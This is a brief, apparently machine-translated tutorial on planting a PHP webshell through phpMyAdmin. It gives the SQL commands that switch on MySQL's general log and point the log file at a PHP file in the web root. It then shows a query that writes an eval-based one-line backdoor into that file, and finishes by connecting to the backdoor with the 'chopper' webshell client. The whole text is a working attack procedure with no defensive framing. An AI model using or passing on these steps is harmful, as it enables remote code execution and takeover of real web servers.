General_log is turned off by default, and when Root is on, General_log_file will save all query statements
So you can open General_log, then set General_log_file as a PHP file, and finally use a word trojan to query to get Webshell
Execute SQL statement at SQL office after entering phpMyAdmin
First check to see if the general log is open
Show variables like ' General_log ';
General log is off state, execute SQL statement Open general log
Set global general_log=on;
Open success
Then set the general_log_file to the absolute path of the shell.
SET global general_log_file= ' c:/phpstudy/phptutorial/www/x.php ';
Content in the x.php created
Then execute the SQL query statement
Select ' <?php @eval ($_post["x"]);? > ';
Successful execution
Look at what's in x.php.
Successfully inserted a sentence Trojan
Connect with the chopper to see if you can parse the
Connection Successful
Take Webshell through phpMyAdmin.